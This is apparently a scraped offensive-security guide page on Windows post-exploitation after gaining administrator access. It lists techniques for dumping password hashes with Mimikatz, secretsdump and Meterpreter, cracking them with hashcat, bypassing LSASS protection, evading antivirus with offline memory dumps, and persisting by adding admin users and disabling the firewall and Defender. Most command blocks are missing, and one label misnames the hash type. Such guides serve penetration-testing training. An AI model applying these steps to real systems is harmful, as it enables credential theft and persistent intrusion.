💀Elevated Post Exploitation
This guide will ensure that you establish better persistence onto systems. It is also a very linear guide, which means that from top-to-bottom these are good practices to enable. Also these modules are AFTER ACHIEVING ADMINISTRATOR ACCESS.
Dumping Hashes
After Administrator access on a Windows computer we can proceed to dump hashes to open up the network to further attacks.
Resources: https://www.ired.team/offensive-security/credential-access-and-credential-dumping
Method 1: Mimikatz
Run the following commands to dump hashes.
Method 2: SecretsDump.py
Valid Administrator Credentials
With valid administrator credentials we could simply execute the following command:
SAM / SYSTEM / SECURITY Hives
We can use the following hives as well to dump the hashes locally. This only requires the transfer of the SYSTEM, SAM, and SECURITY files onto our local machine. We could use whatever file transfer method is the most available to us.
Method 3: Meterpreter
Use the following modules
Cracking NTLMv1 Hashes
hashcat -m 1000 <hash> rockyou.txt
Cracking Cached Domain Credentials
To crack using hashcat we must put in the following format:
Meterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to do it.
Bypassing LSAS Protections
Description
Windows made a protection to protect the dumping of hashes in LSASS, this one is a process that is called PPL, which stands for Protected Processes Light. Basically services run with different integrity levels, therefore we are not able to mess around with processes that have different higher integrity levels that we can touch.
Error
Bypassing PPL
Since PPL is controlled by a kernel process. We can bypass this by writing in kernel level. We will be doing this by making use of the Admin privilege called SeLoadDriver Privilege.
Bypass
Offline Memory Dumps
There will be times that mimikatz will get picked up. We should first try to disable windows defender but lets say an anti virus keeps up with that bullshit we can dump the hashes offline. We will basically be doing more of what we did up there and transfer the a hive of the lsass process.
Transfer DMP file to our attacking windows machine.
Do the same for other processes who you have access to. This could hint to disablign certain things and other shit.
Persistence
Adding Administrator Users
Then we can use psexec to log in.
Disable Firewall
Enable RDP
Disabling Windows Defender
Last updated